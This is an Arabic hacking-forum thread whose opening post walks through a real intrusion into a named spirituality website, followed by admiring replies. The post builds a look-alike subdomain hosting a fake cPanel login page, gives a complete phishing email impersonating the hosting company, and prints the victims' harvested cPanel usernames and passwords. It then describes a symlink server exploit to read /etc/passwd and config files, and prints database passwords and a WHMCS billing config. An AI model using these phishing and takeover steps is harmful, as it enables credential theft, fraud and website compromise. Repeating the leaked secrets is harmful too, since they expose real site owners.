حالة الموضوع:
مغلق
  1. Spiral

    Spiral Developer

    الأنتساب:
    ‏25 أكتوبر 2012
    المشاركات:
    34
    الإعجابات المتلقاة:
    3
    نقاط الجائزة:
    8
    الإقامة:
    J0rd4n

    السلام عليكم

    الحصول على سي بنل على السيرفر واختراق الموقع الهدف عن طريق الهندسة الاجتماعية

    موضوعنا اليوم مبني على الافكار والصراحة انا من الناس الي تحب الافكار وتطورها مع مرور الوقت

    نبدأ في موضوعنا على طول دون مقدمات

    الموقع الهدف:

    [WARNING]منتديات عالم الروحانيات للاتصال محارب الجن 00962799408182[/WARNING]

    [​IMG]

    موقع يختص بالروحانيات وعالم الجن وكلام كله حكي فاضي ( الله يبعدنا #:" )

    ندخل على موقع name.com ومن ثم على Whois حتى نعرف استضافة الموقع الهدف

    [​IMG]

    تمام نشوف الصورة التالية

    [​IMG]

    استضافة الموقع هي شركة jsrhost.com

    [​IMG]

    نتوجه الى موقع hotmail.com ونقوم بانشاء ايميل [email protected] او [email protected]

    طبعا الكل عارف كيفية انشاء الايميل لذلك ما راح نحتاج انه نشرح هالخطوة

    الآن نذهب الى احد مواقع الاستضافة المجانية التي تمنحنا سب دومين + مساحة واحد هذه المواقع هي شركة enterneted.com

    نضغط على Sign Up

    [​IMG]

    الآن اهم شي مكان Domain name نضع اسم الاستضافة التي هي ( jsrhost ) ونقوم بإكمال باقي البيانات كما في الصورة ونضغط على Register

    [​IMG]

    الآن بعد الضغط على Register تظهر لنا الرسالة التالية تعلمنا بانه لنك تفعيل الموقع الخاص بنا قد تم ارساله الى الايميل اللذي وضعناه في التسجيل

    [​IMG]

    الآن نقوم بالدخول إلى الايميل الخاص بنا ونتوجه الى قائمة Junk Mail راح نحصل على رابط التفعيل في الرسالة التي وصلتنا من شركة الاستضافة المجانية

    [​IMG]

    نقوم بالضغط على لنك التفعيل ولما يفتح معنا نبقي الخيار كما هو ( Do not install script ) وبعدها نضغط على Click me to continue

    [​IMG]

    الآن ننتظر قليلا حتى يتم تفعيل الموقع كما هو واضح في الصورة

    [​IMG]

    بعد الانتظار تم تفعيل الموقع والحصول على البيانات كما هو واضح في الصورة التالية

    [​IMG]

    الآن نتوجه الى الجهاز ونقوم بانشاء ملف تكست نخزن فيه باسوورد الايميل وبيانات الموقع حتى لا يتم نسيانهم

    بعد ذلك نتوجه الى برنامج ftp ونقوم بالدخول الى موقعنا

    [​IMG]

    ندخل على مجلد htdocs ونحذف ما بداخله ونقوم برفع ملف index.html يحتوي على كود تحويل وطبعاالموقع الي راح نحول عليه هو موقع الشركة وهذا هو كود التحويل المستخدم

    لتحميل كود التحويل اضغط هنا

    الآن نقوم بانشاء مجلد اسمه cpanel ونضع بداخله سكامة سي بنل وهذه الاسكامة تتكون من 3 ملفات

    اولا: index.html وهي الصفحة المزورة

    ثانيا: connect.php حتى تؤدي وظيفة السكامة وتخزن البيانات المدخلة في ملف pas.txt

    ثالثا: pas.txt يكون فارغ حتى يتم وضع البيانات داخله

    لتحميل السكامة اضغط هنا

    وانتبه ان تكون الصفحة المزورة بنفس شكل صفحة سي بنل الموقع لانه هناك عدة اشكال لمظهر السي بنل وانا ارفقت لكم سكامة وهناك مواضيع كثيرة تشرح كيفية صنع السكامة

    الان موقعنا صار جاهز بعد رفع الملفات هكذا

    [​IMG]

    نجرب ندخل الى http://jsrhost.enterneted.com راح يحولنا على موقع الشركة jsrhost.com

    ندخل على السكامة الخاصة بنا http://jsrhost.enterneted.com/cpanel تمام شغالة كما في الصورة

    [​IMG]

    الآن نقوم بتجهيز الرسالة التالية حتى نبعثها لجميع المستضيفين من الشركة:

    ----------------------------------------------------------------------------

    السلام عليكم

    اعزائنا اصحاب المواقع المستضيفة من شركة جسر هوست لإستضافة المواقع وخدمات الإنترنت

    نود اعلامكم بأنه سيتم ترقية لوحة التحكم ( cpanel ) إلى الاصدار الجديد لجميع المواقع المستضيفة من شركة جسر هوست

    علما بأن الترقية تحمل الكثير من الخصائص والمميزات التي تساعد في التحكم بالموقع

    وهذه الخدمة غير ذاتية لذلك يجب على كل موقع مستضيف من شركة جسر هوست لإستضافة المواقع وخدمات الإنترنت ان يقوم بالدخول إلى الرابط التالي:

    http://jsrhost.enterneted.com/cpanel

    ويقوم بكتابة اسم المستخدم وكلمة المرور لموقعه حتى يتم تفعيلها بشكل ذاتي على شركة cpanel.net

    وعملية الترقية يجب ان تتم خلال يومين من الآن علما بأن من يتأخر يتحمل مسؤولية عدم ترقية لوحة التحكم لموقعه

    شاكرين لكم تعاونكم

    شركة جسر هوست لإستضافة المواقع وخدمات الإنترنت

    ----------------------------------------------------------------------------
    الآن يجب إرسال هذه الرسالة الى جميع المستضيفين وما نترك مستضيف الا نبعثله الرسالة

    لأنه كل ما كان العدد اكبر زادت فرصة النجاح لهذه العملية

    وحتى نعرف المواقع المستضيفة من نفس الشركة نعمل ping للموقع الهدف كي نستخرج الاي بي

    [​IMG]

    ونتوجه الى الموقع الشهير bing.com ونقوم بوضع الاي بي

    [​IMG]

    او اذا مو حاب يطلع لك الموقع مكرر اكثر من مرة بسبب الصفحات المؤرشفة وتحتاج المواقع مرتبة مرة واحد توجه الى الموقع التالي sameip.org

    ونقوم بوضع موقعنا الهدف asraruna.com

    [​IMG]

    تم استخراج جميع المواقع على نفس الاي بي كما هو في الصورة

    [​IMG]

    الآن لدينا اكثر من طريقة لإرسال الرسالة لايميلات اصحاب المواقع السابقة

    اولا: عن طريق معرفة ايميل صاحب الموقع من whois وهناك مواقع كثيرة توفر هذه الخدمة اشهرها name.com

    ثانيا: عن طريق ارسال الرسالة بواسطة "اتصل بنا" في السكربتات التي تستعملها المواقع مثل vbulletin , wordpress ,joomla ... الخ

    ثالثا: عن طريق وجود ايميل صاحب الموقع في الصفحة الرئيسية للمنتدى او الموقع

    رابعا: عن طريق الصفحة الشخصية لصاحب الموقع ومثال على ذلك "المنتدى"

    الآن نقوم بإرسال الرسالة السابقة تحت عنوان ( الترقية الى الاصدار الجديد للوحة التحكم cpanel ) إلى جميع المستضيفين

    طبعا اذا كانت طريقة الارسال عبر سكربت نقوم بوضع ايميل صاحب الشركة admin@jsrhost.com حتى تكون العملية اضمن

    واذا كانت طريقة الارسال عن طريق موقع الهوتميل نقوم بإرسالها من الايميل اللذي انشئناه [email protected]

    الآن لما حدا يدخل على موقعنا الوهمي cPanelآ® 11 راح يلاقي صفحة السي بنل امامه

    واذا قام بادخال بيانات موقعه راح تتخزن على المسار التاليhttp://jsrhost.enterneted.com/cpanel/pas.txt

    الآن هذه العملية بدها صبر يعني انت وحظك ممكن تستغرق ساعة او يوم او اسبوع حسب ما يدخل احد المستضيفين ويقوم بادخال بيانات موقعه

    بالنسبة لي في هذا الموقع استغرقت معي العملية ساعتين ودخلت

    على المسار http://jsrhost.enterneted.com/cpanel/pas.txt ووجدت الآتي

    [​IMG]

    تم الحصول على 3 سي بنل على السيرفر

    الاول
    username: mall4me.net
    password: zzzzzz

    الثاني
    username: albadyhc
    password: rakan1967

    الثالث
    username: scop
    password: 0506671997

    نجرب ندخل باحدى البيانات التي حصلنا عليها

    [​IMG]

    الآن احنا معنا سي بنل على السيرفر نقدر نرفع ملفات ونتخطى حماية ونختصر سيرفر كما نشاء

    لكن انا معي سي بنل ليش ما نختصر السيرفر عن طريق ثغرة فك الضغط واريح راسي من كل هالقصة

    نرفع ملف اختصار السيرفر
    للتحميل اضغط هنا

    ونقوم برفع الهاتكسس لتخطي اي مشاكل وايضا يمكننا استعمال بعض الطرق مثل web disk لتخطي بعض المشاكل مثل forbidden
    للتحميل اضغط هنا

    نقوم بفك الضغط عن طريق السي بنل

    [​IMG]

    الآن نقرأ ملف etc/passwd من الاختصار تبعنا http://al-badyh.com/spiral/iq-team.txt/etc/passwd ونبحث عن يوزر الموقع الهدف من خلال تشابه اليوزر مع اسم الموقع

    واذا كان يوزر الموقع يختلف عن اسم الموقع تستطيع معرفته عن طريق تخطي الحماية وتطبيق الأمر التالي ls -la /etc/valiases/asraruna.com

    ولو ما استطعت تتخطى الحماية تقدر تبحث عن اي خطأ في الموقع من خلال محركات البحث من خلال هذه الطريقة asraruna.com warning

    ولو ما وجدت اي خطأ تقدر تجرب اليوزرات واحد واحد بهذه الطريقة http://207.58.135.22/~user اذا كان عدد اليوزرات قليل كما في حالتنا هذه يعني ما في غلبة

    الآن انا تخطيت الحماية عن طريق البيرل وطبقت الآمر السابق وعرفت يوزر الموقع وهو asrarunac

    الآن نقرأ الكونفق من خلال هذا المسار http://al-badyh.com/spiral/iq-team....des/config.php

    طبعا دون vb لان المنتدى مرفوع على الرئيسية

    تمام تم استخراج الكونفج

    $config['MasterServer']['server****'] = 'localhost';
    $config['Database']['db****'] = 'asrarunac_vb';
    $config['MasterServer']['user****'] = 'asrarunac_vb';
    $config['MasterServer']['password'] = 's5bwo52Y5P';
    الآن بعد الحصول على معلومات الكونفق نتصل بالقاعدة ونغير باسوورد الادمن وندخل او نغير الاندكس من خلال احد سكربتات اختراق vb

    طيب فرضا المنتدى مش موجود على الرئيسية يعني كان هيك asraruna.com/vb وانا بدي اجيب الرئيسية

    وفرضا بدي احاول اني اسحب الدومين

    نروح نشوف نوع سكربت الدعم الي يستعمله موقع الشركة وبعد ما شفنا كان نوع السكربت هو whmcs

    طيب نشوف موقع الشركة على نفس الاي بي ؟

    [​IMG]

    موقع الشركة على نفس الاي بي نطبق الامر التالي من خلال شل البيرل تبعنا ls -la /etc/valiases/jsrhost.com

    يوزر موقع الشركة: skmd

    نتوجه الى المسار التالي http://al-badyh.com/spiral/iq-team....figuration.php

    تم الحصول على الكونفق الخاص بـ whmcs

    <?php
    $license="Leased-d61df791593d9180cf9c";
    $db_host = "localhost";
    $db_user**** = "skmd_support";
    $db_password = "JmhArr}&iG|a";
    $db_**** = "skmd_supportwhmcs";
    $cc_encryption_hash = "AsTOyoATw64DWHzROMNVAqYFedPrdhz4vbUUA25NpqN5sshBG HfIygUf4J0zFdIu";
    $templates_compiledir = "templates_c/";
    $mysql_charset="utf8";
    ?>
    الآن نتصل من سكربت whmcskiller v3 اللذي من برمجة اخونا rab3oun

    راح نحصل على بيانات كثيرة مثل بيانات السي بنل بالموقع الهدف وممكن باسوورد الروت والفيزا كارد وايضا في الاغلب راح نجد البيانات الخاصة للوحة تحكم الدومينات

    نقدر ندخل منها ونقوم بتحويل الدومين لحساب ثاني خاص بنا

    بعد كل هذا نشوف تسجيل اختراق موقعنا الهدف:
    asraruna.com hacked. Notified by Spiral

    الى هنا ينتهي موضوعنا

    ما حبيت اشرح باقي الخطوات بعد الحصول على كونفق whmcs لانه سبق شرحها مرات كثيرة والاغلب منا يعرفها

    وان شاء الله الموضوع الجاي راح يكون طرق ذكية لسحب الايميلات بما فيها الثلاثية
     
    3 شخص معجب بهذا.
  2. روبورت1

    روبورت1 <img src="http://im34.gulfup.com/s2o63.gif"><br>فر

    الأنتساب:
    ‏8 نوفمبر 2012
    المشاركات:
    654
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    18
    عزيزي الكاتب ، شكراً لك على الإفادة في المنتدى بإضافة مادّة علمية جديدة إليه
    كتب الله لك أجر كل من استفاد منها.

    * تنبيه للأعضاء والزوّار ، نتمنّى عدم دخول أيّة روابط خارجيّة أو تحميل أي مرفق موجود بالموضوع
    حتى يتم تأكيد سلامة المحتوى برد من قبل أحد أعضاء فريق الفحص أو مشرف القسم.

    [warning]هذه العضوية آليّة ، غير مُدارة من قبل أي عُنصر بشري ، إنما مبرمجة لتقوم ببعض أعمال التنظيم والمتابعة في المنتدى.[/warning] ​
     
  3. أمير عرش الدموع

    أمير عرش الدموع DeveloPer Plus

    الأنتساب:
    ‏25 يناير 2012
    المشاركات:
    111
    الإعجابات المتلقاة:
    3
    نقاط الجائزة:
    18
    الإقامة:
    IRAQ
    رد: الحصول على سي بنل على السيرفر واختراق الموقع الهدف عن طريق الهندسة الاجتماعية

    ماشاء الله على الابداع


    موضوع قمة الروعه والاهميه وصل حبيبنا الله يحفضك​
     
  4. aBu.HaliL501

    aBu.HaliL501 Developer

    الأنتساب:
    ‏20 مايو 2012
    المشاركات:
    24
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    1
    الوظيفة:
    Security + Hacked
    الإقامة:
    K.$.A
    رد: الحصول على سي بنل على السيرفر واختراق الموقع الهدف عن طريق الهندسة الاجتماعية

    وعليكم السلام ورحمه الله وبركاته

    شرح معتوب عليه

    يوشم بالذهبي + تقييم ان امكن
    :{1}:​
     
  5. مبرمج محترف

    مبرمج محترف Developer

    الأنتساب:
    ‏19 يوليو 2012
    المشاركات:
    76
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    8
    رد: الحصول على سي بنل على السيرفر واختراق الموقع الهدف عن طريق الهندسة الاجتماعية

    بارك الله فيك يا بطل

    استمر
     
  6. ByGhazi2010

    ByGhazi2010 Developer

    الأنتساب:
    ‏20 مايو 2013
    المشاركات:
    52
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    6
    رد: الحصول على سي بنل على السيرفر واختراق الموقع الهدف عن طريق الهندسة الاجتماعية

    ياخى والله انت العظيم *:"
    مبدع تسلم ايديك يا بطل تحياتى
    :{1}:​
     
  7. ⓐⓗⓜⓓ

    ⓐⓗⓜⓓ V • I • P

    الأنتساب:
    ‏13 أكتوبر 2011
    المشاركات:
    142
    الإعجابات المتلقاة:
    2
    نقاط الجائزة:
    18
    الإقامة:
    الحفر ستيـــ
    رد: الحصول على سي بنل على السيرفر واختراق الموقع الهدف عن طريق الهندسة الاجتماعية

    رائع بارك الله فيك اخوي

    بأنتظار جديدك ..
     
  8. ⓐⓗⓜⓓ

    ⓐⓗⓜⓓ V • I • P

    الأنتساب:
    ‏13 أكتوبر 2011
    المشاركات:
    142
    الإعجابات المتلقاة:
    2
    نقاط الجائزة:
    18
    الإقامة:
    الحفر ستيـــ
    رد: الحصول على سي بنل على السيرفر واختراق الموقع الهدف عن طريق الهندسة الاجتماعية

    تم التقيم
    )5:"​
     
  9. The Ceaser

    The Ceaser Active DeveloPer

    الأنتساب:
    ‏22 نوفمبر 2012
    المشاركات:
    86
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    8
    الإقامة:
    Egyp
    رد: الحصول على سي بنل على السيرفر واختراق الموقع الهدف عن طريق الهندسة الاجتماعية

    ماشاء الله عليك آخوي ، مبدع
     
  10. V!P-Hero

    V!P-Hero DeveloPer Plus

    الأنتساب:
    ‏27 مارس 2012
    المشاركات:
    138
    الإعجابات المتلقاة:
    11
    نقاط الجائزة:
    18
    الإقامة:
    هنااااااك
    رد: الحصول على سي بنل على السيرفر واختراق الموقع الهدف عن طريق الهندسة الاجتماعية

    بارك الله فيك على الطرح المميز

    دمت بعز جاري التقيم

    تقبل مروري
     
حالة الموضوع:
مغلق

مشاركة هذه الصفحة